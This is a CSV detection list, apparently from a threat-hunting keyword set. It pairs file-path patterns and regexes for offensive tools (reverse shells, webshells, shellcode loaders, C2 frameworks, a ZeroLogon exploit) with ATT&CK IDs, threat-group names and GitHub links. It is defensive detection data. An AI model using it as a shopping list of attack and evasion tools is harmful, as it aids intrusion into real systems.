"*/SharpWMI.exe*",".{0,1000}\/SharpWMI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11166"
"*/SharpWMI.exe*",".{0,1000}\/SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11167"
"*/SharpWSManWinRM.vbs*",".{0,1000}\/SharpWSManWinRM\.vbs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","11168"
"*/SharpWSUS*",".{0,1000}\/SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","11169"
"*/SharpXDecrypt.exe*",".{0,1000}\/SharpXDecrypt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11170"
"*/SharPyShell*",".{0,1000}\/SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","11171"
"*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11172"
"*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11173"
"*/SharpZeroLogon.exe*",".{0,1000}\/SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11174"
"*/SharpZeroLogon.git*",".{0,1000}\/SharpZeroLogon\.git.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","1","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","11175"
"*/Shell/reflect.jsp?u=http://*",".{0,1000}\/Shell\/reflect\.jsp\?u\=http\:\/\/.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11176"
"*/shell/shell_port.*",".{0,1000}\/shell\/shell_port\..{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","11177"
"*/shell?cmd=whoami*",".{0,1000}\/shell\?cmd\=whoami.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11178"
"*/shell?k=*&ip=*&cmd=*",".{0,1000}\/shell\?k\=.{0,1000}\&ip\=.{0,1000}\&cmd\=.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","11179"
"*/shell_exec.py*",".{0,1000}\/shell_exec\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","11180"
"*/Shell3er.git*",".{0,1000}\/Shell3er\.git.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","11181"
"*/Shell3er.ps1*",".{0,1000}\/Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","11182"
"*/Shell3er/*",".{0,1000}\/Shell3er\/.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","11183"
"*/shellcode*loader.bin*",".{0,1000}\/shellcode.{0,1000}loader\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","11184"
"*/shellcode.bin*",".{0,1000}\/shellcode\.bin.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","11185"
"*/shellcode.bin.*",".{0,1000}\/shellcode\.bin\..{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","11186"
"*/shellcode.hex*",".{0,1000}\/shellcode\.hex.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","11187"
"*/shellcode.hpp*",".{0,1000}\/shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","11188"
"*/shellcode.sgn*",".{0,1000}\/shellcode\.sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","11189"
"*/shellcode_callback.exe*",".{0,1000}\/shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","11190"
"*/shellcode_excel*",".{0,1000}\/shellcode_excel.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","11191"
"*/shellcode_generate.py*",".{0,1000}\/shellcode_generate\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","11192"
"*/ShellCode_Loader*",".{0,1000}\/ShellCode_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","11193"
"*/shellcode_samples/*",".{0,1000}\/shellcode_samples\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","11194"
"*/shellcode_sources/*",".{0,1000}\/shellcode_sources\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","11195"
"*/shellcode2vba.py*",".{0,1000}\/shellcode2vba\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11196"
"*/shellcode2vbafunc.py*",".{0,1000}\/shellcode2vbafunc\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11197"
"*/ShellcodeFluctuation*",".{0,1000}\/ShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","11198"
"*/Shellcode-Hide.git*",".{0,1000}\/Shellcode\-Hide\.git.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","11199"
"*/SHELLCODELOADER*",".{0,1000}\/SHELLCODELOADER.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","11200"
"*/Shellcode-Loader.git*",".{0,1000}\/Shellcode\-Loader\.git.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","11201"
"*/shellcodes/utils.py*",".{0,1000}\/shellcodes\/utils\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","11202"
"*/shellcodetester*",".{0,1000}\/shellcodetester.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","11203"
"*/shellcode-xor.py*",".{0,1000}\/shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","11204"
"*/ShellGen.git*",".{0,1000}\/ShellGen\.git.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","1","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","11205"
"*/ShellGen.ps1*",".{0,1000}\/ShellGen\.ps1.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","1","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","11206"
"*/ShellGhost.git*",".{0,1000}\/ShellGhost\.git.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","11207"
"*/shellinject*",".{0,1000}\/shellinject.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","11208"
"*/ShellPop*",".{0,1000}\/ShellPop.{0,1000}","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","N/A","10","1458","237","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z","11209"
"*/ShellPwnsh.git*",".{0,1000}\/ShellPwnsh\.git.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","11210"
"*/Shells/shell.aspx*",".{0,1000}\/Shells\/shell\.aspx.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11211"
